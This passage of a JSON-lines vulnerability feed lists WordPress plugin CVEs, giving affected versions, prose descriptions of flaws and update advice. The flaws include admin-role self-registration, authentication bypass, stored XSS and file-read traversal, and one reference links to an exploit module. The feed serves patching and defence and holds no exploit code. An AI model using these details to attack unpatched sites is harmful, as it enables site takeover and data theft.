version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cdf67099-5514-45ba-9a4c-10af984bf593?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cdf67099-5514-45ba-9a4c-10af984bf593?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rover-idx\\\/tags\\\/3.0.0.2903\\\/admin\\\/rover-panel-setup.php#L76\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rover-idx\\\/tags\\\/3.0.0.2903\\\/admin\\\/rover-panel-setup.php#L76\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rover-idx\\\/tags\\\/3.0.0.2903\\\/admin\\\/rover-panel-setup.php#L120\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rover-idx\\\/tags\\\/3.0.0.2903\\\/admin\\\/rover-panel-setup.php#L120\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rover-idx\\\/tags\\\/3.0.0.2903\\\/admin\\\/rover-panel-setup.php#L152\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rover-idx\\\/tags\\\/3.0.0.2903\\\/admin\\\/rover-panel-setup.php#L152\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rover-idx\\\/tags\\\/3.0.0.2903\\\/admin\\\/rover-panel-setup.php#L199\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rover-idx\\\/tags\\\/3.0.0.2903\\\/admin\\\/rover-panel-setup.php#L199\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rover-idx\\\/tags\\\/3.0.0.2903\\\/admin\\\/rover-panel-setup.php#L225\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rover-idx\\\/tags\\\/3.0.0.2903\\\/admin\\\/rover-panel-setup.php#L225\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rover-idx\\\/tags\\\/3.0.0.2903\\\/admin\\\/rover-panel-setup.php#L240\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rover-idx\\\/tags\\\/3.0.0.2903\\\/admin\\\/rover-panel-setup.php#L240\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rover-idx\\\/tags\\\/3.0.0.2903\\\/admin\\\/rover-panel-setup.php#L270\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rover-idx\\\/tags\\\/3.0.0.2903\\\/admin\\\/rover-panel-setup.php#L270\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3171681\\\/rover-idx\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3171681\\\/rover-idx\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0177","slug":"javo-core","versionImpact":"3.0.0.080","versionEndExcluding":"3.0.0.266","description":"The Javo Core plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 3.0.0.080. This is due to the plugin allowing users who are registering new accounts to set their own role. This makes it possible for unauthenticated attackers to gain elevated privileges by creating an account with the administrator role.","recommendation":"Update to version 3.0.0.266, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/javo-directory-wordpress-theme\\\/8390513#item-description__update-history\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/javo-directory-wordpress-theme\\\/8390513#item-description__update-history\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7d636768-37b4-4343-9028-30e7b1f997f2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7d636768-37b4-4343-9028-30e7b1f997f2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6444","slug":"seriously-simple-podcasting","versionImpact":"2.25.3","versionEndExcluding":"3.0.0","description":"The Seriously Simple Podcasting WordPress plugin before 3.0.0 discloses the Podcast owner's email address (which by default is the admin email address) via an unauthenticated crafted request.","recommendation":"Update to version 3.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/061c59d6-f4a0-4cd1-b945-5e92b9c2b4aa\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/061c59d6-f4a0-4cd1-b945-5e92b9c2b4aa\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10639","slug":"auto-prune-posts","versionImpact":"2.0.0","versionEndExcluding":"3.0.0","description":"The Auto Prune Posts WordPress plugin before 3.0.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 3.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/efab3a36-535b-40ff-b98f-482a0e5193f1\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/efab3a36-535b-40ff-b98f-482a0e5193f1\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6036","slug":"web3-authentication","versionImpact":"2.8.0","versionEndExcluding":"3.0.0","description":"The Web3 WordPress plugin before 3.0.0 is vulnerable to an authentication bypass due to incorrect authentication checking in the login flow in functions 'handle_auth_request' and 'hadle_login_request'. This makes it possible for non authenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the username.","recommendation":"Update to version 3.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7f30ab20-805b-422c-a9a5-21d39c570ee4\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7f30ab20-805b-422c-a9a5-21d39c570ee4\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13501","slug":"formassembly-web-forms","versionImpact":"2.0.11","versionEndExcluding":"3.0.0","description":"The WP-FormAssembly plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'formassembly' shortcode in all versions up to, and including, 2.0.11 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/formassembly-web-forms\\\/tags\\\/2.0.11\\\/wp_formassembly.php#L32\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/formassembly-web-forms\\\/tags\\\/2.0.11\\\/wp_formassembly.php#L32\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/formassembly-web-forms\\\/tags\\\/2.0.11\\\/wp_formassembly.php#L47\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/formassembly-web-forms\\\/tags\\\/2.0.11\\\/wp_formassembly.php#L47\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/25ff6cc3-02ed-470a-aa10-4843e1ec01ce?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/25ff6cc3-02ed-470a-aa10-4843e1ec01ce?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5658","slug":"wp-mapit","versionImpact":"2.7.1","versionEndExcluding":"3.0.0","description":"The WP MapIt plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wp_mapit' shortcode in all versions up to, and including, 2.7.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7ef6f598-e1a7-4036-9485-1aad0416349a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7ef6f598-e1a7-4036-9485-1aad0416349a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-mapit\\\/tags\\\/2.7.1\\\/wp_mapit\\\/classes\\\/class.wp_mapit_map.php#L235\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-mapit\\\/tags\\\/2.7.1\\\/wp_mapit\\\/classes\\\/class.wp_mapit_map.php#L235\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5076","slug":"ziteboard-online-whiteboard","versionImpact":"2.9.9","versionEndExcluding":"3.0.0","description":"The Ziteboard Online Whiteboard plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'ziteboard' shortcode in versions up to, and including, 2.9.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f5608f50-e17a-471f-b644-dceb64d82f0c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f5608f50-e17a-471f-b644-dceb64d82f0c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2988896\\\/ziteboard-online-whiteboard\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2988896\\\/ziteboard-online-whiteboard\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9836","slug":"rss-feed-widget","versionImpact":"2.9.9","versionEndExcluding":"3.0.0","description":"The RSS Feed Widget WordPress plugin before 3.0.0 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"Update to version 3.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f87af54e-3e58-4c29-8a30-e7d52234c9d4\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f87af54e-3e58-4c29-8a30-e7d52234c9d4\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11918","slug":"image-alt-text","versionImpact":"2.0.0","versionEndExcluding":"3.0.0","description":"The Image Alt Text plugin for WordPress is vulnerable to unauthorized modification of data| due to a missing capability check on the iat_add_alt_txt_action and iat_update_alt_txt_action AJAX actions in all versions up to, and including, 2.0.0. This makes it possible for authenticated attackers, with subscriber-level access and above, to update the alt text on arbitrary images.","recommendation":"Update to version 3.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3188755%40image-alt-text&new=3188755%40image-alt-text&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3188755%40image-alt-text&new=3188755%40image-alt-text&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/22143fe3-e599-4b44-99c0-ba66d88ff5d6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/22143fe3-e599-4b44-99c0-ba66d88ff5d6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5954","slug":"aone-sms","versionImpact":"2.0.0","versionEndExcluding":"3.0.0","description":"The Service Finder SMS System plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 2.0.0. This is due to the plugin not restricting user role selection at the time of registration through the aonesms_fn_savedata_after_signup() function. This makes it possible for unauthenticated attackers to register as an administrator user.","recommendation":"Update to version 3.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/service-finder-service-and-business-listing-wordpress-theme\\\/15208793\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/service-finder-service-and-business-listing-wordpress-theme\\\/15208793\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/520c1e8b-d0c1-4201-90bf-0cefab9af7e0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/520c1e8b-d0c1-4201-90bf-0cefab9af7e0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11462","slug":"filestack-upload","versionImpact":"2.1.0","versionEndExcluding":"3.0.0","description":"The Filestack Official plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'fstab' and 'filestack_options' parameters in all versions up to, and including, 2.0.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 3.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/filestack-upload\\\/tags\\\/2.0.0\\\/lib\\\/admin-settings.php#L103\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/filestack-upload\\\/tags\\\/2.0.0\\\/lib\\\/admin-settings.php#L103\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/559a94d8-527d-48b3-a917-461ebfa012bc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/559a94d8-527d-48b3-a917-461ebfa012bc?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13385","slug":"screenshot-machine-shortcode","versionImpact":"2.3.0","versionEndExcluding":"3.0.0","description":"The JSM Screenshot Machine Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'ssm' shortcode in all versions up to, and including, 2.3.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/jsmoriss\\\/screenshot-machine-shortcode\\\/blob\\\/main\\\/screenshot-machine-shortcode.php#L92-L119\",\"name\":\"https:\\\/\\\/github.com\\\/jsmoriss\\\/screenshot-machine-shortcode\\\/blob\\\/main\\\/screenshot-machine-shortcode.php#L92-L119\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3224419%40screenshot-machine-shortcode&new=3224419%40screenshot-machine-shortcode&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3224419%40screenshot-machine-shortcode&new=3224419%40screenshot-machine-shortcode&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/91019c36-bf33-4cd6-ac54-86c118d086fe?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/91019c36-bf33-4cd6-ac54-86c118d086fe?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9109","slug":"flexible-shipping-ups","versionImpact":"2.3.11","versionEndExcluding":"3.0.0","description":"The WooCommerce UPS Shipping \u2013 Live Rates and Access Points plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the delete_oauth_data function in all versions up to, and including, 2.3.11. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete the plugin's API key.","recommendation":"Update to version 3.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/699fdea9-15ae-4882-9723-9a98d7d53c74?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/699fdea9-15ae-4882-9723-9a98d7d53c74?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/flexible-shipping-ups\\\/trunk\\\/vendor_prefixed\\\/octolize\\\/wp-ups-oauth\\\/src\\\/OAuth\\\/Ajax.php#L32\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/flexible-shipping-ups\\\/trunk\\\/vendor_prefixed\\\/octolize\\\/wp-ups-oauth\\\/src\\\/OAuth\\\/Ajax.php#L32\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3173845\\\/flexible-shipping-ups\\\/tags\\\/3.0.0\\\/vendor_prefixed\\\/octolize\\\/wp-ups-oauth\\\/src\\\/OAuth\\\/Ajax.php?old=3158553&old_path=flexible-shipping-ups%2Ftags%2F2.3.11%2Fvendor_prefixed%2Foctolize%2Fwp-ups-oauth%2Fsrc%2FOAuth%2FAjax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3173845\\\/flexible-shipping-ups\\\/tags\\\/3.0.0\\\/vendor_prefixed\\\/octolize\\\/wp-ups-oauth\\\/src\\\/OAuth\\\/Ajax.php?old=3158553&old_path=flexible-shipping-ups%2Ftags%2F2.3.11%2Fvendor_prefixed%2Foctolize%2Fwp-ups-oauth%2Fsrc%2FOAuth%2FAjax.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-37259","slug":"wpextended","versionImpact":"2.4.7","versionEndExcluding":"3.0.0","description":"Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in WP Extended The Ultimate WordPress Toolkit \u2013 WP Extended allows Reflected XSS.This issue affects The Ultimate WordPress Toolkit \u2013 WP Extended: from n\/a through 2.4.7.","recommendation":"Update to version 3.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wpextended\\\/wordpress-wp-extended-plugin-2-4-7-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wpextended\\\/wordpress-wp-extended-plugin-2-4-7-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5613","slug":"super-testimonial","versionImpact":"2.9","versionEndExcluding":"3.0","description":"The Super Testimonials plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'tpsscode' shortcode in all versions up to, and including, 2.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/super-testimonial\\\/tags\\\/2.8\\\/tp-testimonials.php#L214\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/super-testimonial\\\/tags\\\/2.8\\\/tp-testimonials.php#L214\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2979378\\\/super-testimonial#file9\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2979378\\\/super-testimonial#file9\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/52659f1c-642e-4c88-b3d0-d5c5a206b11c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/52659f1c-642e-4c88-b3d0-d5c5a206b11c?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2015-10136","slug":"gi-media-library","versionEndExcluding":"3.0","description":"The GI-Media Library plugin for WordPress is vulnerable to Directory Traversal in versions before 3.0 via the 'fileid' parameter. This allows unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information.","refs":"[{\"url\":\"http:\\\/\\\/wordpressa.quantika14.com\\\/repository\\\/index.php?id=24\",\"name\":\"http:\\\/\\\/wordpressa.quantika14.com\\\/repository\\\/index.php?id=24\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/espreto\\\/wpsploit\\\/blob\\\/master\\\/modules\\\/auxiliary\\\/scanner\\\/http\\\/wp_gimedia_library_file_read.rb\",\"name\":\"https:\\\/\\\/github.com\\\/espreto\\\/wpsploit\\\/blob\\\/master\\\/modules\\\/auxiliary\\\/scanner\\\/http\\\/wp_gimedia_library_file_read.rb\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/1132677\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/1132677\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gi-media-library\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gi-media-library\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7754\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7754\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.rapid7.com\\\/db\\\/modules\\\/auxiliary\\\/scanner\\\/http\\\/wp_gimedia_library_file_read\\\/\",\"name\":\"https:\\\/\\\/www.rapid7.com\\\/db\\\/modules\\\/auxiliary\\\/scanner\\\/http\\\/wp_gimedia_library_file_read\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2f80c3b9-5148-42eb-9137-9c538184cda3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2f80c3b9-5148-42eb-9137-9c538184cda3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5458","slug":"cits-support-svg-webp-media-upload","versionEndExcluding":"3.0","description":"The CITS Support svg, webp Media and TTF,OTF File Upload WordPress plugin before 3.0 does not sanitise uploaded SVG files, which could allow users with a role as low as Author to upload a malicious SVG containing XSS payloads.","recommendation":"Update to version 3.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/47d15f1c-b9ca-494d-be8f-63c30e92f9b8\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/47d15f1c-b9ca-494d-be8f-63c30e92f9b8\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1407","slug":"paid-memberships-pro","versionImpact":"2.12.10","versionEndExcluding":"3.0","description":"The Paid Memberships Pro \u2013 Content Restriction, User Registration, & Paid Subscriptions plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.12.10. This is due to missing or incorrect nonce validation on multiple functions. This makes it possible for unauthenticated attackers to subscribe to, modify, or cancel membership for a user via a forged request granted they can trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 3.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c46bcbd1-566d-4b21-84a1-f25e3df7ddc7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c46bcbd1-566d-4b21-84a1-f25e3df7ddc7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/paid-memberships-pro\\\/tags\\\/2.12.10\\\/includes\\\/functions.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/paid-memberships-pro\\\/tags\\\/2.12.10\\\/includes\\\/functions.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/strangerstudios\\\/paid-memberships-pro\\\/pull\\\/2893\",\"name\":\"https:\\\/\\\/github.com\\\/strangerstudios\\\/paid-memberships-pro\\\/pull\\\/2893\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/strangerstudios\\\/paid-memberships-pro\\\/pull\\\/2839\",\"name\":\"https:\\\/\\\/github.com\\\/strangerstudios\\\/paid-memberships-pro\\\/pull\\\/2839\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3058329%40paid-memberships-pro%2Ftrunk&old=3033153%40paid-memberships-pro%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3058329%40paid-memberships-pro%2Ftrunk&old=3033153%40paid-memberships-pro%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5005","slug":"autocomplete-location-field-contact-form-7","versionImpact":"2.0","versionEndExcluding":"3.0","description":"The Autocomplete Location field Contact Form 7 WordPress plugin before 3.0, autocomplete-location-field-contact-form-7-pro WordPress plugin before 2.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 3.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bfb174d4-7658-4883-a682-d06bda89ec44\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bfb174d4-7658-4883-a682-d06bda89ec44\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0399","slug":" \timage-over-image-vc-extension","versionEndExcluding":"3.0","description":"The Image Over Image For WPBakery Page Builder WordPress plugin before 3.0 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/702d7bbe-93cc-4bc2-b41d-cb66e08c99a7\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/702d7bbe-93cc-4bc2-b41d-cb66e08c99a7\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3471","slug":"button-generation","versionImpact":"2.3.9","versionEndExcluding":"3.0","description":"The Button Generator  WordPress plugin before 3.0 does not have CSRF check in place when bulk deleting, which could allow attackers to make a logged in admin delete buttons via a CSRF attack","recommendation":"Update to version 3.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a3c282fb-81b8-48bf-8c18-8366ea8ad9af\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a3c282fb-81b8-48bf-8c18-8366ea8ad9af\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9458","slug":"reservit-hotel","versionImpact":"2.1","versionEndExcluding":"3.0","description":"The Reservit Hotel WordPress plugin before 3.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 3.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1157d6ae-af8b-4508-97e9-b9e86f612550\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1157d6ae-af8b-4508-97e9-b9e86f612550\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
